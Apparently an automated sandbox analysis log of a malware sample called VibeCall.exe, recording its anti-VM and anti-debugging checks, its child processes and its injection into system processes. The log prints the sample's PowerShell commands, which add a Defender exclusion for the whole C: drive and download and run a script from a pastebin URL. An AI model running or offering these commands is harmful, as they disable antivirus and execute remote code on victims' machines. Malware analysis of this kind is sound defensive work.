                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      barindex
                      Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                      Source: C:\Users\user\Desktop\VibeCall.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\Desktop\VibeCall.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
                      Source: C:\Users\user\Desktop\VibeCall.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
                      Source: C:\Users\user\Desktop\VibeCall.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
                      Source: C:\Users\user\Desktop\VibeCall.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
                      Switches to a custom stack to bypass stack traces
                      Source: C:\Users\user\Downloads\contry_solution_vibecall_e.exeAPI/Special instruction interceptor: Address: 7FFE2220D044
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeAPI/Special instruction interceptor: Address: 7FFE2220D044
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeAPI/Special instruction interceptor: Address: 582B83A
                      Source: C:\Users\user\Documents\soundsolution_vibecall_c.exeAPI/Special instruction interceptor: Address: 7FFE2220D044
                      Source: C:\Windows\SysWOW64\OpenWith.exeAPI/Special instruction interceptor: Address: 7FFE2220D044
                      Source: C:\Windows\SysWOW64\OpenWith.exeAPI/Special instruction interceptor: Address: 4B6A83A
                      Source: C:\Users\user\Downloads\videosolution_vibecall_b.exeAPI/Special instruction interceptor: Address: 7FFE2220D044
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeAPI/Special instruction interceptor: Address: 519B83A
                      Source: C:\Users\user\Desktop\VibeCall.exeMemory allocated: 1D88AB10000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Documents\aisolution_vibecall_a.exeCode function: 12_2_0101B610 sidt fword ptr [00000000h]12_2_0101B610
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\Desktop\VibeCall.exeWindow / User API: threadDelayed 523Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7050Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2618Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4687Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1737Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6702
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2947
                      Source: C:\Users\user\Documents\soundsolution_vibecall_c.exeAPI coverage: 0.0 %
                      Source: C:\Users\user\Downloads\videosolution_vibecall_b.exeAPI coverage: 0.0 %
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7776Thread sleep count: 7050 > 30Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7776Thread sleep count: 2618 > 30Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7908Thread sleep time: -5534023222112862s >= -30000sJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7892Thread sleep count: 4687 > 30Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7904Thread sleep count: 1737 > 30Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7944Thread sleep time: -11990383647911201s >= -30000sJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7972Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7872Thread sleep time: -30000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8004Thread sleep time: -2767011611056431s >= -30000sJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3368Thread sleep count: 6702 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5812Thread sleep count: 2947 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2668Thread sleep time: -4611686018427385s >= -30000s
                      Source: C:\Users\user\Desktop\VibeCall.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Manufacturer FROM Win32_BIOS
                      Source: C:\Users\user\Desktop\VibeCall.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Manufacturer FROM Win32_BIOS
                      Source: C:\Users\user\Desktop\VibeCall.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Manufacturer FROM Win32_BIOS
                      Source: C:\Users\user\Desktop\VibeCall.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Manufacturer FROM Win32_BIOS
                      Source: C:\Users\user\Desktop\VibeCall.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Manufacturer FROM Win32_BIOS
                      Source: C:\Users\user\Desktop\VibeCall.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Manufacturer FROM Win32_BIOS
                      Source: C:\Users\user\Desktop\VibeCall.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Manufacturer FROM Win32_BIOS
                      Source: C:\Users\user\Desktop\VibeCall.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Manufacturer FROM Win32_BIOS
                      Source: C:\Users\user\Desktop\VibeCall.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Manufacturer FROM Win32_BIOS
                      Source: C:\Users\user\Desktop\VibeCall.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Manufacturer FROM Win32_BIOS
                      Source: C:\Users\user\Desktop\VibeCall.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Manufacturer FROM Win32_BIOS
                      Source: C:\Users\user\Desktop\VibeCall.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Manufacturer FROM Win32_BIOS
                      Source: C:\Users\user\Desktop\VibeCall.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Manufacturer FROM Win32_BIOS
                      Source: C:\Users\user\Desktop\VibeCall.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Manufacturer FROM Win32_BIOS
                      Source: C:\Users\user\Desktop\VibeCall.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Manufacturer FROM Win32_BIOS
                      Source: C:\Users\user\Desktop\VibeCall.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Manufacturer FROM Win32_BIOS
                      Source: C:\Users\user\Desktop\VibeCall.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Manufacturer FROM Win32_BIOS
                      Source: C:\Users\user\Desktop\VibeCall.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Manufacturer FROM Win32_BIOS
                      Source: C:\Users\user\Desktop\VibeCall.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Manufacturer FROM Win32_BIOS
                      Source: C:\Users\user\Desktop\VibeCall.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT TotalPhysicalMemory FROM Win32_ComputerSystem
                      Source: C:\Users\user\Desktop\VibeCall.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
                      Source: C:\Users\user\Desktop\VibeCall.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
                      Source: C:\Users\user\Desktop\VibeCall.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
                      Source: C:\Users\user\Desktop\VibeCall.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\SysWOW64\OpenWith.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\SysWOW64\OpenWith.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\Default\AppData
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\Default
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\Default\AppData\Local\Microsoft\InputPersonalization\TrainedDataStore
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\Default\AppData\Local\Microsoft\InputPersonalization
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\Default\AppData\Local
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\Default\AppData\Local\Microsoft
                      Source: soundsolution_vibecall_c.exe, 0000000E.00000003.2581937101.0000000004530000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: DisableGuestVmNetworkConnectivity
                      Source: powershell.exe, 00000004.00000002.1953659683.00000278BBBE0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWI
                      Source: soundsolution_vibecall_c.exe, 0000000E.00000003.2581937101.0000000004530000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: EnableGuestVmNetworkConnectivity
                      Source: VibeCall.exe, 00000000.00000003.2116072770.000002192B160000.00000004.00000020.00020000.00000000.sdmp, VibeCall.exe, 00000000.00000003.2365903581.000002192B148000.00000004.00000020.00020000.00000000.sdmp, VibeCall.exe, 00000000.00000003.2158394262.000002192B160000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: C:\Users\user\Desktop\VibeCall.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\Downloads\contry_solution_vibecall_e.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\Downloads\contry_solution_vibecall_e.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\Documents\soundsolution_vibecall_c.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\Documents\soundsolution_vibecall_c.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\Downloads\videosolution_vibecall_b.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\Downloads\videosolution_vibecall_b.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\Downloads\contry_solution_vibecall_e.exeCode function: 13_3_01764ED5 LdrInitializeThunk,VirtualFree,13_3_01764ED5
                      Source: C:\Users\user\Downloads\contry_solution_vibecall_e.exeCode function: 13_3_01767D4D IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,13_3_01767D4D
                      Source: C:\Users\user\Downloads\contry_solution_vibecall_e.exeCode function: 13_3_03040277 mov eax, dword ptr fs:[00000030h]13_3_03040277
                      Source: C:\Users\user\Downloads\contry_solution_vibecall_e.exeCode function: 13_2_03040277 mov eax, dword ptr fs:[00000030h]13_2_03040277
                      Source: C:\Users\user\Documents\soundsolution_vibecall_c.exeCode function: 14_3_01192277 mov eax, dword ptr fs:[00000030h]14_3_01192277
                      Source: C:\Users\user\Downloads\videosolution_vibecall_b.exeCode function: 15_3_01629277 mov eax, dword ptr fs:[00000030h]15_3_01629277
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeCode function: 20_3_02F10283 mov eax, dword ptr fs:[00000030h]20_3_02F10283
                      Source: C:\Windows\SysWOW64\OpenWith.exeCode function: 25_3_00410283 mov eax, dword ptr fs:[00000030h]25_3_00410283
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeCode function: 34_3_005A0283 mov eax, dword ptr fs:[00000030h]34_3_005A0283
                      Source: C:\Users\user\Desktop\VibeCall.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Users\user\Downloads\contry_solution_vibecall_e.exeCode function: 13_3_01767D4D IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,13_3_01767D4D
                      Source: C:\Users\user\Downloads\contry_solution_vibecall_e.exeCode function: 13_3_0176800F SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,13_3_0176800F
                      Source: C:\Users\user\Downloads\contry_solution_vibecall_e.exeCode function: 13_3_01774B0C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,13_3_01774B0C
                      Source: C:\Users\user\Desktop\VibeCall.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Adds a directory exclusion to Windows Defender
                      Source: C:\Users\user\Desktop\VibeCall.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:'
                      Source: C:\Users\user\Desktop\VibeCall.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:'
                      Source: C:\Users\user\Desktop\VibeCall.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:'Jump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:'Jump to behavior
                      Bypasses PowerShell execution policy
                      Source: C:\Users\user\Desktop\VibeCall.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/ySSytGm5" -UseBasicParsing).Content"
                      Source: C:\Users\user\Desktop\VibeCall.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:'Jump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/ySSytGm5" -UseBasicParsing).Content"Jump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:'Jump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeProcess created: C:\Users\user\Documents\aisolution_vibecall_a.exe "C:\Users\user\Documents\aisolution_vibecall_a.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeProcess created: C:\Users\user\Downloads\contry_solution_vibecall_e.exe "C:\Users\user\Downloads\contry_solution_vibecall_e.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeProcess created: C:\Users\user\Documents\soundsolution_vibecall_c.exe "C:\Users\user\Documents\soundsolution_vibecall_c.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeProcess created: C:\Users\user\Downloads\videosolution_vibecall_b.exe "C:\Users\user\Downloads\videosolution_vibecall_b.exe"Jump to behavior
                      Source: C:\Users\user\Downloads\contry_solution_vibecall_e.exeProcess created: C:\Windows\SysWOW64\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"Jump to behavior
                      Source: C:\Users\user\Documents\soundsolution_vibecall_c.exeProcess created: C:\Windows\SysWOW64\OpenWith.exe "C:\Windows\system32\openwith.exe"Jump to behavior
                      Source: C:\Users\user\Downloads\videosolution_vibecall_b.exeProcess created: C:\Windows\SysWOW64\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"Jump to behavior
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeProcess created: C:\Windows\System32\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"Jump to behavior
                      Source: C:\Windows\SysWOW64\OpenWith.exeProcess created: C:\Windows\System32\OpenWith.exe "C:\Windows\system32\openwith.exe"
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeProcess created: C:\Windows\System32\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"
                      Source: C:\Users\user\Downloads\contry_solution_vibecall_e.exeCode function: 13_3_0176781B cpuid 13_3_0176781B
                      Source: C:\Windows\System32\OpenWith.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
